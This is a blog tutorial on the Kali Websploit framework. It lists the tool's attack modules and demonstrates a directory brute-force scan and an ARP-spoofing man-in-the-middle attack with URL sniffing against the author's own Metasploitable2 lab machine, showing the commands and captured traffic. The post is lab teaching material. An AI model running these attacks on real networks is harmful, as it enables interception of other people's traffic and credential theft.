Wednesday, March 30, 2016

Kali Tool Series - Websploit

Although it seems that there are other more handly tools for web exploits other than Websploit, it still interests me by having a similiar inferface as Metasploit.

To Start

> websploit

 __    __    ___  ____    _____ ____  _       ___  ____  ______
|  |__|  |  /  _]|    \  / ___/|    \| |     /   \|    ||      |
|  |  |  | /  [_ |  o  )(   \_ |  o  ) |    |     ||  | |      |
|  |  |  ||    _]|     | \__  ||   _/| |___ |  O  ||  | |_|  |_|
|  `  '  ||   [_ |  O  | /  \ ||  |  |     ||     ||  |   |  |
 \      / |     ||     | \    ||  |  |     ||     ||  |   |  |
  \_/\_/  |_____||_____|  \___||__|  |_____| \___/|____|  |__|


                --=[WebSploit FrameWork
        +---**---==[Version :2.0.5 BETA
        +---**---==[Codename :We're Not Crying Wolf
        +---**---==[Available Modules : 19
                --=[Update Date : [r2.0.5-000 2.3.2014]



wsf >

Show available modules

wsf > show modules

Web Modules                     Description
-------------------             ---------------------
web/apache_users                Scan Directory Of Apache Users
web/dir_scanner                 Directory Scanner
web/wmap                        Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                         PHPMyAdmin Login Page Scanner
web/cloudflare_resolver         CloudFlare Resolver


Network Modules                 Description
-------------------             ---------------------
network/arp_dos                 ARP Cache Denial Of Service Attack
network/mfod                    Middle Finger Of Doom Attack
network/mitm                    Man In The Middle Attack
network/mlitm                   Man Left In The Middle Attack
network/webkiller               TCP Kill Attack
network/fakeupdate              Fake Update Attack Using DNS Spoof
network/arp_poisoner            Arp Poisoner


Exploit Modules                 Description
-------------------             ---------------------
exploit/autopwn                 Metasploit Autopwn Service
exploit/browser_autopwn         Metasploit Browser Autopwn Service
exploit/java_applet             Java Applet Attack (Using HTML)


Wireless / Bluetooth Modules            Description
-------------------             ---------------------
wifi/wifi_jammer                Wifi Jammer
wifi/wifi_dos                   Wifi Dos Attack
wifi/wifi_honeypot              Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod         Bluetooth Ping Of Death Attack

Cases

Here, I am going to try some modules in Websploit. And, the target will be my own Metasploitable2 virtual machine. Make sure you don’t try any actions described here on a running machine that doesn’t belong to you.

Scan Directories

We are scanning the directories under the target machine using HTTP requests with bruteforce. As far as I know, DirBuster is also famous for doing this job. And, by doing this action, it’s easy for the target machine to be noticed since lots of invalid requests will be sent out in a short period.

wsf > use web/dir_scanner
wsf:Dir_Scanner > show options

Options          Value
---------       --------------
TARGET          http://google.com

wsf:Dir_Scanner > set target http://192.168.63.156
TARGET =>  192.168.63.156

wsf > run
…

However, I don’t think the program does a good job as it doesn’t print out the result in the same time, the user might have to wait util it’s completed. And, it usually takes a long time.

Man in the Middle

Man in the Middle is an interesting attack. The attacker stay silent and steal the network traffic from the victim, then pass it over. That is, the victim may not notice that his/her traffic is totally monitored by the attacker.

Attacker side:

wsf > use network/mitm
wsf:MITM > show options

Options          Value                           RQ      Description
---------       --------------                  ----    --------------
Interface       eth0                            yes     Network Interface Name
ROUTER          192.168.1.1                     yes     Router IP Address
TARGET          192.168.1.2                     yes     Target IP Address
SNIFFER         driftnet                        yes     Sniffer Name (Select From Sniffer List)
SSL             true                            yes     SSLStrip, For SSL Hijacking(true or false)


Sniffers         Description
------------    --------------
dsniff           Sniff All Passwords
msgsnarf         Sniff All Text Of Victim Messengers
urlsnarf         Sniff Victim Links
driftnet         Sniff Victim Images

wsf:MITM > set TARGET 192.168.63.156
TARGET =>  192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER =>  192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER =>  urlsnarf
wsf:MITM > run
[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

Then, the victim start to browse the Internet. I’m letting the victim run wget google.com to simulate Internet surfing.

Back to the attacker, here’s that he/she recieved:

192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"

Reference